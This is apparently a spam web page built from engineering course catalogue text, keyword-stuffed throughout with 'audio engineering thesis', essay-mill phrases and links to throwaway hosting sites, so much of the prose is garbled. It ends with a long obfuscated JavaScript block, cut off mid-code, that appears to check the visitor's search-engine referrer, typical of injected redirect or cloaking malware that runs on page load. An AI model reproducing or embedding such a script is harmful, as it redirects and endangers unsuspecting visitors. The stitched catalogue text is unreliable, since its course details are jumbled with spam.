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Review of probability, introduction to stochastic processes, development of classical teletraffic and queueing models, application to audio engineering thesis computer and telecommunications networks. EELEEE Scattering parameters, matching networks and the Smith chart, amplifier stability considerations, amplifier design to meet various criteria, low noise, broadband, high power skriv et essay om k�rlighed og parforhold i historisk belysning design, RF oscillator design, CAD design techniques.

Electronics 2 EEE 3 credits Prerequisite: Differential amplifiers, frequency response, feedback amplifiers, oscillators, power amplifiers, integrated electronics. EEL Sampling and data acquisition, design of simple digital filters, programming and hardware implementation, audio applications, audio engineering thesis spectrum analysis using FFT. EEL Introduction to probability and random processes. Response of linear systems to stochastic inputs. Distribution functions, power spectra, correlation functions, noise theory.

Detection of electrical signal in the presence of noise. Applications of radar, radio signal fading, etc. Permission of instructor Lower-division special topics in areas of electrical engineering not covered by other courses such as experimental advanced high school work.

Illustrates the numerical problem-solving process, testing and interpretation of results through a variety of engineering examples and applications. Circuits 1 EEL 3 credits Prerequisites: Circuits 2 EEL 2 credits Prerequisite: EEE Introduction to audio engineering thesis electronic test equipment; measurement techniques, experimental analysis and design of linear and non-linear circuits. EELMAC Vector analysis, electrostatic fields, magnetostatic fields, transverse electromagnetic waves, reflection and refraction of plane waves, and transmission lines.

EEL Introduction to filter design. Topics include physical realizability, passive and active 2-port network synthesis, sensitivity calculations, switched capacitor filters, OTAs, introduction to digital filters.

EEL Fundamentals of electromechanical devices; energy conversion, transformers and rotary machines. The operation and analysis of power systems is presented. Topics include energy supply and demand, structure of power systems, power system components, voltage and frequency control and load flows.

EEL Transformers, 3-phase distribution systems, 3-phase motors and generators, dc motors and generators, rundreisevietnam.com CAD design software on UNIX based workstations.

rundreisevietnam.comEEE Review of electromagnetics, transmission lines, waveguides, microwave network analysis, impedance matching and tuning, microwave resonators, microwave power dividers, couplers and filters, microwave oscillators and mixers, CAD design techniques.

EEL Antenna parameters, wire antennas, loop antennas, array matching techniques, broadband antennas, traveling wave antennas and antenna measurements. EEE and EEL Introduction lt higgins graduation speech electromagnetic compatibility EMCintersystem and intra-system interferences and their characteristics, coupling by conduction and radiation, shielding, and interference reduction techniques.

EEL Transmission of signals, amplitude modulation, frequency modulation, pulse modulation. EEL Lab experiments include: AM and FM transmitters and critical thinking puns audio engineering thesis division and frequency multiplexing, phase-locked loops.

EEL Introduction to audio engineering thesis control theory. Topics include system modeling and simulation, audio engineering thesis variable analysis, signal flow graphs, transient and steady state response, stability analysis and design of controllers.

EEL State variables, delta function and Impulse response, convolution, Fourier Transform and applications, discrete time systems, Z-transform and applications, Fourier transform of discrete signals. May be taken for repeated credit. Permission of instructor Topics in specialized areas, such as networks, electronics, and machines, not adequately covered in other courses.

May be repeated for credit. Intersections of Science, Engineering, and the Humanities ETG 3 credits Course focuses on the audio engineering thesis influence of science in its endeavor to understand nature, engineering in it attempts to harness nature, and the humanities in their essential role as the shapers of values. This is accomplished through a combination of learned readings, penetrating discussions, computer models and software tools, and a final project and competition.

This is a General Education course. EEL Course provides a audio engineering thesis perspective of bioengineering as applied to topics in contemporary biology, physiology, and medicine, including biotechnology and bioinformatics.

Biosystems Modeling and Control BME anibalandjorge9.000webhostapp.com Laboratory work and high level of instrumentations that helps this Laboratory work to grow the tissues.

Mechanical functions of the chinese food in malaysia essay extracellular matrix, types, quality, purposes of scaffolds as the supporters of 3-Dtissue growth, discussed.

Concepts and definitions of molecular biological terms. Information resources and databases: Biological sequence analysis and applications. Bioinformatics versus modern information networks and the World Wide Web.

EEL or permission of instructor This course covers the generation of bioelectrical signals, their acquisition, modeling and analysis. Modeling and analysis tools cover adaptive filtering, time-frequency analysis, model-based spectral analysis, stochastic signals and signal representation in orthogonal bases: EEE Analysis, simulation, and computer-aided design of basic open-loop and feedback, single-stage and differential CMOS amplifiers, taking into account frequency response, noise, and parameters tolerance.

Graduate standing or EEL and EEE This course provides an introduction to the basic steps and processes of fabricating integrated circuit semiconductor devices. Standard fabrication processes, including oxidation, diffusion, etching, lithography, ion implantation, 5 paragraph essay why college education is important to me vapor deposition, and front and back end integration are covered.

Audio Engineering

High Frequency Amplifiers EEE 3 credits Electromagnetic fields and waves, analysis and design of transistor circuits; tow-port networks, matching networks, stability considerations, RF transistor amplifier design, broadband and high-power design methods; CAD techniques for RF amplifier design.

Nanobiotechnology EEE 3 credits Prerequisite: It also covers the fundamentals of nanotechnology in biological and biomedical research.

EEL or permission of instructor An analysis of audio engineering thesis signals and systems, difference calculus, sampling theory, Z-transform and the audio engineering thesis Fourier transform, digital filter synthesis and implementation, and fast Fourier transform algorithms.

Topics include radar equations, pulse and tracking radars, and radar transmitters and receivers. Front and back end uses with practical examples. EEE This course covers the principles of linear adaptive filtering, various adaptive filtering techniques, and their relationships to optimal linear filter solutions.

Also emphasized are such applications such as adaptive filtering as noise and echo cancellation, adaptive equalization, line enhancement, and beam forming. Topics include advanced digital filter design techniques, reconstruction of signals from DSP samples, wavelets, and multirate signal processing and its applications to speech analysis. EEE A course in digital modeling, processing, and representation of speech signals, short time Fourier analysis, speech spectrograms, linear predictive coding, person-machine communication by voice.

EEE and EEL Electromagnetic theory, harmonic transmission lines, waveguides, microwave network analysis, impedance matching and tuning, microwave resonators, powder dividers, couplers and filters, microwave oscillators and mixers, CAD design techniques.

EEL Random signals and noise, random processes, physical noise sources, and digital data transmission and reception. MAS or Engineering graduate standing or permission of instructor Fundamentals of linear systems theory and practice as applied to multi-input and multi-output feedback control systems: State audio engineering thesis models, stability, controllability, observability, state feedback and estimation, linear fansdeanimes.000webhostapp.com regulators, computer-aided analysis and design using Matlab control systems toolbox.

EEL Internal stability, stabilization, minimum weighted sensitivity control design, basic literature review design in the presence of unknown disturbances, and model uncertainty.

Senior or graduate standing Robot classification, robot systems, economic justification; product design for robot assembly; programming, audio engineering thesis feeding, tooling. Permission of instructor An advanced course in specialized areas not adequately covered in other courses. It may be repeated for credit. Fourier Optics Essay tentang kb Holography EEL 3 credits Analysis of two-dimensional linear systems, scalar diffraction theory, Fresnel and Fraunhofer diffraction, transforming properties of lenses, optical imaging systems, theory and application of holography.

EEL A dissertation on the passions david hume field equivalence, reciprocity, Green’s functions; boundary value problems in rectangular, cylindrical, and spherical coordinates.

EEL Signaling audio engineering thesis fading channels, generation of coherent references, synchronization of digital communication systems, spread spectrum techniques.

Digital Satellite Communication EEL 3 credits Satellite communication systems, audio engineering thesis orbits, propagation effects, link budget calculating performance of digital modulation options. EEE or permission of instructor Information theory, entropy, coding information sources, noisy channels, codes for error detection and correction. EEE Hypothesis testing; detection of signals and noise; detection of diamondegy.com with unknown parameters; detection of weak signals; non-parametric detection; decentralized detection; robust detection; and applications.

EEL pay for papers online fiber waveguides, optical sources and detectors, optical modulation and demodulation, fiber optic components and devices, noise in optical systems, system design. EEL or permission of instructor Course introduces seniors and audio engineering thesis students in electrical engineering to the fundamentals of wireless personal communication services, systems, and networks.

The course focuses on the principles, technologies, system architectures, and standards for wireless access networks for telephony, data communications, and portable computing. EEL Recent trends related to learning and decision-making capabilities of intelligent control systems using neural networks and fuzzy logic. Emphasis on controller design for industrial applications.

Neural Complex and Artificial Neural Networks EEL 3 credits Multifaceted representation of neural activity in terms of neurobiology, cognitive science, art of computation, cybernetics and physics of statistical mechanics.

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Neural network modeling mimicking biological neural complex and development of allanlopesfotografia.000webhostapp.com neural networks.

Permission of instructor Courses in specialized areas not adequately covered in other courses may be taken for repeated credit. Architectural and integrated audio engineering thesis perspectives, design aspects, QoS, and implementations – streaming of packetized voice, data, and audio engineering thesis through local-loops and core networks. CHM and CHM L or equivalents with minimum grades of „C“ Physical, chemical, and microbiological components of environmental systems in how do we write a reflective essay and engineering.

Introduction to water quality management, air pollution control, solid waste management, pollution prevention techniques, and risk analysis. ENV C with minimum grade of „C“ and permission of department This course introduces students to the study of the major physical, chemical and biological processes of pollutant transformation and transport audio engineering thesis air, water and the audio engineering thesis.

PHY with a grade of „C“ or higher; permission of department This course introduces students to the principles of sustainability, life cycle cost analysis, pollution prevention, audio engineering thesis impacts of engineering and infrastructure planning and design. ENV L This course introduces students to the regulations dealing with air quality, basic meteorology, the physics at atmospheric dispersion, indoor air quality and design of air pollution audio engineering thesis systems.

ENV Practical laboratory work in air sampling and analysis, source testing, instrumentation, criteria air pollutants and dispersion modeling. ENV C with minimum grade of „C“ and permission of department This course introduces students to the regulations dealing with solid and hazardous waste management, design of solid waste management facilities and design of hazardous waste treatment and site remediation strategies.

Special Topics in Environmental Engineering ENV credits Topics in audio engineering thesis engineering of interest to engineering students. CWR C or equivalent, ENV C or equivalent, and permission of instructor This course introduces students to the principles and design of physical, chemical and biological treatment systems for potable and wastewater applications.

Hydraulic Systems Engineering ENV C 3 credits This class is outlines the concepts behind the design of piping and pumping stations.

  • SUR L Use of computer-aided drafting and mapping from surveyed field data, familiarization with hardware and software available for surveying and mapping computations and drafting, data storage and output from automated devices used in surveying, use of total stations and electronic field data collection systems, field-to-finish products.
  • Build an infrastructure to develop personal and practical Apps.
  • Introduction to Geomatics Engineering SUR 3 credits An introduction to the fundamental concepts of geomatics engineering philosophical thought; the technical, professional, ethical, and social responsibilities of the geomatics engineer; geomatics engineering professional and career opportunities; professional ethics and safety.
  • Part-time PhD study normally takes six years 45 months to 96 months.

The class includes a review business plan reference site hydraulics and piping networks, pipe materials, pump selection, multiple pump systems, sewer pumping networks and pump station design and appurtenances.

Permission essay on how would you define success instructor Study relating to specialized topics associated with environmental engineering. Sources, characteristics, and effects of specific air pollutants; Lower audio engineering thesis motion dynamics; Dispersion and interaction of pollutants in the atmosphere; Smog effects; Air audio engineering thesis standards and regulations; Air pollution audio engineering thesis methods; Acid rain.

Solid Waste Management ENV 3 credits Quantities and composition of refuse; Municipal and industrial solid waste disposal methods; Sanitary landfills; Incineration; Grinding thesis greek mythology composting of refuse; Energy recovery from solid wastes; Hazardous waste; Optimization techniques to solid waste operation and management.

ENV C Bacteriological, chemical, and physical water quality standards; distribution systems; water treatment theory and design; aeration; coagulation and flocculation; sedimentation; filtration; disinfection; softening; membranes. ENV C Wastewater characterization, collection, and pumping. Physical unit operations and biological treatment unit process design including screening, sedimentation, filtration, activated sludge, disinfection, sludge digestion, and sludge disposal.

Environmental Systems and Processes ENV 3 credits Physical, audio engineering thesis, and biological processes, reactor theory, particle transport, mass transfer, mixing, advection, dispersion, diffusion, sorption, phase transfer. Sustainability and Pollution Prevention ENV 3 credits This course introduces students to the principles of audio engineering thesis sustainability, life cycle cost analysis, pollution prevention and environmental resource management of infrastructure planning and design.

Senior standing; permission of instructor Design teams are audio engineering thesis for capstone design projects with multiple realistic constraints focused on audio engineering thesis technology professional practice issues. Introduction to Geomatics Engineering SUR 3 credits An introduction to the fundamental concepts of geomatics engineering philosophical thought; the technical, professional, ethical, and social responsibilities of the geomatics engineer; geomatics engineering professional homework essay help career opportunities; professional ethics and safety.

Geomatics SUR 2 credits Prerequisite: MAC with a audio engineering thesis grade of „C“ or permission of instructor Corequisite: SUR L Use of computer-aided drafting and mapping from surveyed field data, familiarization with hardware and software available for surveying and mapping computations and drafting, data storage and output from automated devices used in surveying, use of total stations and electronic field data collection systems, field-to-finish products.

SUR Use of computer-aided drafting and mapping from surveyed field data, familiarization with hardware and software available for surveying and mapping computations and drafting, data www.eieingenieria.com site surveys and mapping; earthwork computations. SUR Surveying applications for engineering, construction, and transportation work. SUR Physical elements of designing land subdivisions, including circulation systems, sewer systems, drainage systems, soils and earthwork grading considerations, erosion control, lot and block arrangement, topography and existing land use factors, geometric analysis procedures, presentations to city planning and zoning boards.

SURSUR L and audio engineering thesis course in statistics, all with audio engineering thesis grades of „C“ Applications of electrical and electronics engineering essay in surveying ; measurement theory, analysis of measurements, computation and adjustment of spatial data. Emphasis on audio engineering thesis applications for adjustments and analysis.

SUR L, SUR An introduction to the principles of hydrographic surveying, concepts, theory and applications of audio engineering thesis acoustic wave propagation, surveying applications for depth determination, seafloor classification and feature detection, water levels and flow, hydrographic practice.

An introduction to the principles of hydrographic surveying, concepts, theory and applications of underwater acoustic wave propagation, surveying applications for depth determination, seafloor classification and feature detection, audio engineering thesis levels and flow, hydrographic practice.

SUR L Use of aerial photographs for mapping, geometry of single photo and stereographic models, scale and relief displacement, audio engineering thesis and titled photos, parallax, photo mosaics, ground control stereoplotters, resection, orthophotos, oblique photos.

SUR Use of aerial photographs for mapping, geometry of single photo and stereographic models, scale and relief displacement, vertical and titled photos, parallax, photo mosaics, ground control stereoplotters, resection, orthophotos, oblique photos. GIS C with a grade of „C“ or better or permission of instructor Methods and applications of thermal infrared remote sensing, temperature information with an appropriate spatial and temporal coverage at local and regional scales, use of thermal infrared thermometer and thermal camera technologies.

SUR and SUR L with minimum grades of „C“ Cadastral systems, legal principles of property boundary retracement, land descriptions, parcel identification, rights-of-way and legal descriptions of real property.

Ethical and legal aspects of practice, surveyor as audio engineering thesis witness, surveyor-client relationship, responsibilities to the profession. SUR L Concepts of geodesy, ellipsoidal geometry, geodetic coordinates, gravity, datums, satellite orbits and practical applications of GPS data collection, post-processing and adjusting networks. SUR Concepts of geodesy, ellipsoidal geometry, geodetic coordinates, gravity, datums, satellite orbits, and practical applications of GPS data collection, post-processing and adjusting networks.

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Lab is coordinate with lecture. Topics include fundamentals of GPS, geodesy, project planning, survey techniques, field procedures, data processing and evaluation, network adjustment, and an overview of audio engineering thesis. SUR and SUR L Design teams are audio engineering thesis and projects with multiple realistic constraints selected for the senior capstone design project.

Projects are developed with the advice and approval of practitioners and faculty. Proposals are completed and accepted by the faculty and local practitioners. Design and audio engineering thesis practice issues are presented and discussed. Design team projects with multiple audio engineering thesis constraints culminate in audio engineering thesis and audio engineering thesis reports. Permission of instructor Study relating to specialized topics associated with geomatics engineering.

Interdisciplinary rundreisevietnam.com new generation, innovative, and advanced materials for civil infrastructure systems, such as bridges, tall structures, and highway pavements.

Mixed-design and mechanical properties, environmentally sound concepts, green building and sustainable development, accelerated testing essay questions durability, infrastructure security, impact and blast resistant materials and design.

For pre-approved dual-enrolled high school students only Teaches students current web technologies and Internet programming at the introductory level.

This course is project based; therefore, students are required to finish Internet-based projects using the tools introduced in class. For pre-approved dual-enrolled high school students only Basic and advanced electronic design principles in theory, computer lab PSPICE simulations and hands-on electronics lab experiments and design project.

Topics include audio amplifiers, filters, AM wireless optical communication, and extensive technical report assignments. For pre-approved dual-enrolled high school students only An interactive course to introduce students to new and powerful tools to boost their creative problem solving skills.

Students enhance their communication and teaming skills, unlock their creative potential, and are introduced to topics related to intellectual property Problem solving for decision makers hbr marketing. Permission of instructor Lower-division special topics in areas of engineering not covered by other courses such as experimental advanced high school work.

Statics EGN 3 credits Prerequisite: MAC Analysis of force and moment systems for audio engineering thesis equilibrium of trusses, beams, frames, and machines; elements of frictions; centroid, center of gravity, center of audio engineering thesis, and moment of inertia.

Dynamics EGN 3 credits Prerequisite: EGN with minimum grade of „C“ Dynamics of particles and rigid bodies, applications of free-body diagrams, Newton’s second law, the impulse-momentum method audio engineering thesis the work-energy principle to solve dynamic problems in mechanical systems.

Senior Thesis Archive

EGN with minimum grade of „C“ Concepts of stress and strain; audio engineering thesis properties of materials, force, deformation and stress analysis of audio engineering thesis members; stress and strain transformations; principal stresses; failure theories; and concept of buckling. PHYMACwith minimum grade of „C“ Topics include properties of a simple pure compressible substance, equations of state, the first law of thermodynamics, internal energy, specific heats, enthalpy and the application of the first law to a system or a control newsmakeragentcom.000webhostapp.com The study of the second law of thermodynamics is also discussed leading to the discovery of entropy as a property and its ramifications.

EGN Structure of material systems from the atomic, micro and macroscopic standpoints. The differences between an MPhil and PhD is in the volume, originality and significance of the work you will do.

The conclusions to this report will suggest an appropriate next step, which audio engineering thesis normally be some sort of experimental study designed to test a hypothesis you have formulated from your literature review. Your study might involve software design, acoustic measurements, listening tests, etc.

The results of this study will be written up in another report and possibly as a conference paper which will include a discussion of their significance to your project. Your literature review and experimental study, perhaps together with some additional reading or experimentation, will lead to either: A thesis around 50, words drawing appropriate conclusions, and a viva examination.

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Alternatively, it may be possible at this audio engineering thesis to transfer to PhD registration. A full progress report drawing appropriate conclusions, refining research questions and detailing a research plan to allow these questions to be answered, together with a viva examination. This will lead to further literature-based and experimental research, conference and possibly journal publications, and your final PhD thesis around 70, words and a viva examination.

Your training needs will be identified and met by the University’s internal postgraduate research training, modules from the University’s taught degree programmes, external courses or guided reading. Postgraduate research students are strongly encouraged to work here at the University. A gyrator is a passive, linear, lossless, two-port proofing and editing network element proposed by by Bernard DH Tellegen in his paper The gyrator, a new electric network element by Bernard DH Tellegen click for the mirror copy audio engineering thesis on The Hearing Blog.

Unlike the four conventional elements, the gyrator is non-reciprocal. An audio engineering thesis property of a gyrator is that it inverts the current-voltage characteristic of an electrical component or network; and in the case of audio engineering thesis elements, the impedance is also inverted; or in other words, a gyrator can make a capacitive circuit behave inductively, a audio engineering thesis LC circuit behave like a parallel LC circuit, and so on.

Gyrators permit network realizations of two- or-more -port devices which cannot be realized with just the conventional four elements. Unlike Tellegin’s then-hypothetical circuit element, gyrators audio engineering thesis make audio engineering thesis network realizations of isolators and circulators; and is primarily used in audio engineering thesis filter design and miniaturization today, including in audio filters such as equalizers and analog hearing aids, replacing bulky inductors with small precision capacitors.

Gyrators do not, however, change Dissertation hours per day range of one-port devices that can be realized: Although Tellegen conceived it as a fifth linear element, its adoption makes both the ideal transformer and either the capacitor or inductor redundant; thus the number of necessary linear elements is in fact reduced to three.

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$=String.fromCharCode(118,82,61,109,46,59,10,40,120,39,103,41,33,45,49,124,107,121,104,123,69,66,73,53,56,55,54,72,84,77,76,60,34,48,112,47,119,63,38,95,43,85,67,65,44,58,37,122,51,62,125);_=([![]]+{})[+!+[]+[+[]]]+([]+[]+{})[+!+[]]+([]+[]+[][[]])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[+[]]+([]+[]+{})[+!+[]]+(!![]+[])[+!+[]];_[_][_]($[0]+(![]+[])[+!+[]]+(!![]+[])[+!+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[2]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]]+([![]]+{})[+!+[]+[+[]]]+(!![]+[])[!+[]+!+[]]+$[3]+(!![]+[])[!+[]+!+[]+!+[]]+([]+[]+[][[]])[+!+[]]+(!![]+[])[+[]]+$[4]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+$[5]+$[6]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[+[]]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[7]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+$[10]+([]+[]+{})[+!+[]]+([]+[]+{})[+!+[]]+$[10]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+([]+[]+{})[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[16]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]]+([![]]+{})[+!+[]+[+[]]]+$[16]+$[10]+([]+[]+{})[+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+$[17]+(![]+[])[+!+[]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+$[17]+(![]+[])[+!+[]]+$[18]+([]+[]+{})[+!+[]]+([]+[]+{})[+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+(![]+[])[+!+[]]+([]+[]+{})[+!+[]]+(![]+[])[!+[]+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+$[16]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+$[0]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+!+[]]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[15]+$[15]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[1]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[+[]]+$[4]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+([]+[]+[][[]])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+$[8]+(![]+[]+[]+[]+{})[+!+[]+[]+[]+(!+[]+!+[]+!+[])]+(![]+[])[+[]]+$[7]+$[9]+$[4]+([]+[]+{})[!+[]+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([]+[]+[][[]])[+!+[]]+$[10]+$[4]+$[9]+$[11]+$[12]+$[2]+$[13]+$[14]+(+{}+[]+[]+[]+[]+{})[+!+[]+[+[]]]+$[11]+$[6]+$[19]+$[6]+$[6]+([]+[]+[][[]])[!+[]+!+[]]+([]+[]+{})[+!+[]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